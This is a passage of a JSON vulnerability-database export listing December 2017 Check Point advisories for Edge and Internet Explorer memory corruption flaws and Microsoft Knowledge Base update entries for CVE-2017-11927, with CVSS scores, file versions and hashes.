"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1028", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:36", "description": "A remote code execution vulnerability exists in Microsoft Edge. The vulnerability is due to the way Microsoft Edge renders when accesses objects in memory. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11909)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11909"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1049", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:36", "description": "A remote code execution vulnerability exists in Microsoft Edge. The vulnerability is due to the way Microsoft Edge improperly accesses objects in memory. Successful exploitation of this vulnerability can achieve Remote Code Execution.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11914)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11914"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1047", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:33", "description": "An integer overflow vulnerability exists in Microsoft Browsers. The vulnerability is due to an integer overflow when JavaScript handles huge number of integers in memory. Successful exploitation of this vulnerability can result in Remote Code Execution.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-11930)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1040", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:34", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in the way Internet Explorer accesses an object in memory. A remote attacker can exploit this issue by enticing a target victim to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11890)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11890"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1036", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:36", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is in the way that Microsoft Internet Explorer JavaScript engines render content when handling objects in memory. The vulnerability can corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11901)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11901"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1043", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:36", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object in memory that has been deleted. A remote attacker can exploit this vulnerability by enticing a target victim to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11903)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11903"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1029", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:40", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object in memory. A remote attacker can exploit this vulnerability by enticing a target victim to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11907)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11907"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1031", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:41:44", "description": "A remote code execution vulnerability exists in Microsoft Edge. The vulnerability is in the way that Microsoft browser javascript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Memory Corruption (CVE-2017-11888; CVE-2018-8125)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11888", "CVE-2018-8125"], "modified": "2018-07-10T00:00:00", "id": "CPAI-2017-1032", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:38:36", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to a type confusion when handling scripts. A remote attacker can exploit this issue by enticing a target victim to open a specially crafted web page that could cause memory corruption in a way that would allow attackers to execute code on the target system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (MS16-104: CVE-2016-3375; CVE-2017-11913)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3375", "CVE-2017-11913"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2016-0750", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:47:44", "description": "<html><body><p>Resolves an information disclosure vulnerability in Windows Server 2008.</p><h2>Summary</h2><div class=\"kb-summary-section section\">An information disclosure vulnerability exists when the Windows <em>its://</em> protocol handler unnecessarily sends traffic to a remote site to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.<br/><br/>To learn more about the vulnerability, go to <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11927\" id=\"kb-link-2\" target=\"_self\"> CVE-2017-11927</a>.</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important</span><br/>\u00a0<ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"> <h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>. </div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4053473\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>Deployment information</h2><p>For deployment details for this security update, see the following article in the Microsoft Knowledge Base:</p><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/20171212\" id=\"kb-link-9\">Security update deployment information: December 12, 2017</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></td></tr></tbody></table><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4053473-x86.msu</td><td>38BCE995E8AC36FD9DBC74C2ACDF0039FBA032A5</td><td>FE57E559C28FFD0C3B9566A10B12C77B8AEC2D9569B6F77EE5ABD3FCC833C2D2</td></tr><tr><td>Windows6.0-KB4053473-ia64.msu</td><td>A64AFC344797A4138707CE211C361A2C0CFE724D</td><td>03C6F1BD5C569C9019E233BCF65392CD5F135BD34A2AE7D5F4467EB8CC85A4F6</td></tr><tr><td>Windows6.0-KB4053473-x64.msu</td><td>3C9024AEC6CCF45025FB4E10D9D776E2933A66C9</td><td>9CF1E8631D67134FF69A47DB2EC478571CA8B9B9BCB1281A581145FDCCE76CD6</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>File information</strong><br/><br/><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and\u00a0times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows Server 2008 file information</strong></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"alert-title\">Notes</div><div class=\"row\"><div class=\"col-xs-24\"><p>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.</p></div></div></div></div><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>158,208</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>141,824</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported ia64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>601,600</td><td>07-Nov-2017</td><td>16:28</td><td>IA-64</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>393,728</td><td>07-Nov-2017</td><td>16:28</td><td>IA-64</td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>158,208</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>141,824</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>192,000</td><td>07-Nov-2017</td><td>18:14</td><td>x64</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>169,472</td><td>07-Nov-2017</td><td>18:14</td><td>x64</td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>158,208</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>141,824</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr></tbody></table></td></tr></tbody></table></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-12T00:00:00", "type": "mskb", "title": "Description of the security update for the information disclosure vulnerability in Windows Server 2008: December 12, 2017\n", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2017-12-12T18:14:05", "id": "KB4053473", "href": "https://support.microsoft.com/en-us/help/4053473/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T10:39:42", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. \n \nTo learn more about the vulnerability, go to [CVE-2017-11927](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-11927>).\n\n## More Information\n\n**Important **If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4130957>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, see the following article in the Microsoft Knowledge Base:[Security update deployment information: May 08, 2018](<http://support.microsoft.com/en-us/help/20180508>)\n\n## More Information\n\n \n**File information** \n \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files. \n \n**Windows Server 2008 file information**\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## How to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\n## Windows server 2008 file information\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4130957-ia64.msu| F95AA5018FFCDCEC540797840F162B6E18FB1999| B3870E9CDE256E1D1847625F8FF7BC617C8E453B2ADE7C09447428BE3F23AC03 \nWindows6.0-KB4130957-x86.msu| 1F65BE1B43ED61D43289E87BBEE91CA6E52A6970| 2A3CCB97059EAECC4EF20BA9A09AD7E3A108AF1AC04D77AD8ABC2586F13C2133 \nWindows6.0-KB4130957-x64.msu| FB05FBE543F0874E745A00B4C2EE5BA3FF1BD248| EFEB04D9E317221F07CAEC7ED6D2D7C76E1AEA4060890A4037EE7B2EA2E29995 \n \n## For all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nItircl.dll| 6.0.6002.24379| 601,600| 12-Apr-2018| 14:30| IA-64 \nItss.dll| 6.0.6002.24379| 394,240| 12-Apr-2018| 14:30| IA-64 \nItircl.dll| 6.0.6002.24379| 158,720| 12-Apr-2018| 14:48| x86 \nItss.dll| 6.0.6002.24379| 142,336| 12-Apr-2018| 14:48| x86 \n \n## For all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nItircl.dll| 6.0.6002.24379| 158,720| 12-Apr-2018| 14:48| x86 \nItss.dll| 6.0.6002.24379| 142,336| 12-Apr-2018| 14:48| x86 \n \n## For all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nItircl.dll| 6.0.6002.24379| 192,000| 12-Apr-2018| 14:38| x64 \nItss.dll| 6.0.6002.24379| 169,472| 12-Apr-2018| 14:38| x64 \nItircl.dll| 6.0.6002.24379| 158,720| 12-Apr-2018| 14:48| x86 \nItss.dll| 6.0.6002.24379| 142,336| 12-Apr-2018| 14:48| x86 \n \n## Windows Embedded POSReady 2009 and Windows Embedded Standard 2009 file information\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindowsXP-KB4130957-x86-Embedded-ENU.exe| DAB532721CE76725B35909E6D95C9D430EDC1E13| 202E7266247BB2646F2A76D80CB1808A6389CFEF2EB8FE00599EC1CA26A516F4 \n**Windows Embedded POSReady 2009 and Windows Embedded Standard 2009 file information**\n\n## For all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nItss.dll| 5.2.3790.6349| 138,240| 30-Apr-2018| 19:10| x86 \nUpdspapi.dll| 6.3.13.0| 382,840| 01-Feb-2018| 21:28| x86\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "Description of the security update for the Windows information disclosure vulnerability in Windows Server 2008, Windows Embedded POSReady 2009, and Windows Embedded Standard 2009: May 08, 2018", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", 